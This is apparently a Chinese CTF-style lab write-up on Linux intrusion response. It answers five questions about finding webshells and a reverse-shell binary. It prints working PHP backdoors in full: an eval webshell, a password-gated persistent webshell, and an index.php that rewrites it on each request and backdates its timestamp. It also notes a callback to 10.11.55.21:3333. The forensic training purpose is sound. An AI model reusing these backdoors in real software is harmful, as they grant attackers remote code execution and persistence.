第一章-应急响应-Linux入侵排查-玄机靶场
字数统计:
481字
|
阅读时长:
2分
一个Linux入侵排查的简单靶场记录
题目问题
1
2
3
4
5
| 1.web目录存在木马,请找到木马的密码提交
2.服务器疑似存在不死马,请找到不死马的密码提交
3.不死马是通过哪个文件生成的,请提交文件名
4.黑客留下了木马文件,请找出黑客的服务器ip提交
5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交
|
问题一–web目录存在木马,请找到木马的密码提交
按照题目描述发现1.php里有后门
1
2
| root@ip-10-0-10-2:/var/www/html
<?php eval($_POST[1]);?>
|
问题二–服务器疑似存在不死马,请找到不死马的密码提交
在/var/www/html/.shell.php发现个疑似不死马(很像之前awd里的)
1
| <?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>
|
问题三–不死马是通过哪个文件生成的,请提交文件名
继续探索可以发现index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| <?php
include('config.php');
include(SYS_ROOT.INC.'common.php');
$path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
if(substr($path, 0,1)=='/'){
$path=substr($path,1);
}
$path = Base::safeword($path);
$ctrl=isset($_GET['action'])?$_GET['action']:'run';
if(isset($_GET['createprocess']))
{
Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']);
}else{
Index::run($path);
}
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
?>
|
问题四–黑客留下了木马文件,请找出黑客的服务器ip提交
按照描述发现目录有个shell.elf。
把文件拉入微步沙箱分析(主要太菜了,有反调试555)
发现连接目的ip为 10.11.55.21
问题五–黑客留下了木马文件,请找出黑客服务器开启的监端口提交
微步沙箱流量包,发现目的端口为3333
